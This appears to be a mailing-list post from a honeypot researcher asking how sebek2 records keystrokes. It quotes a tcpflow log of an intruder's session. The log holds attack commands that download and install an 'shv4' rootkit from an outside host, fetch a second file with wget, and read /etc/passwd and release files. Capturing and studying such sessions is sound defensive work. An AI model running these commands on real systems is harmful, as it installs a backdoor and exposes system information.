keystroke recording

[Shibuya Yoshihiro <yashibu () sfc keio ac jp>]

Hi, I am deploying GenII Honeypot and recording attacks by using sebek2.
And I got some keystroke but I found some keystrokes which sebek2 cannot
record. I also using tcpflow, tcpflow recorded attack scripts and after
keystrokes.

Follow is scripts which tcpflow got (Sebek2 cannot records)

--- tcpflow log start ---

> (Buffer overflow attack scripts)
> TERM=xterm; export TERM=xterm; exec bash -i

> lynx -source http://debbyzalina.com/exploits/tools/shv4.tar.gz >
> shv4.tar.gz; tar -zxvf shv4.tar.gz; cd shv4; ./setup cyber2002x 51437
> ;uname -a; id;

> caat /etc/hosts
> cd /tmp
> ls -a
> cat /etc/*ease
> cat /etc/passwd
> cat /etc/*ease
> wget http://e-wac.tripod.com/panjie/huhuy
> k a0
> ls -
> cat /etc/hosts
> w

--- tcpflow log end ---

I caught 50 times such a attack-keystroke sets for port443(apache-1.3.20) in
4 days, and an attacker made some accounts, login honeypot, so I could
get sebek2 keystroke saving.

Please tell me what mechanism of keystroke saving (including scbek2
mechanism).

Regards.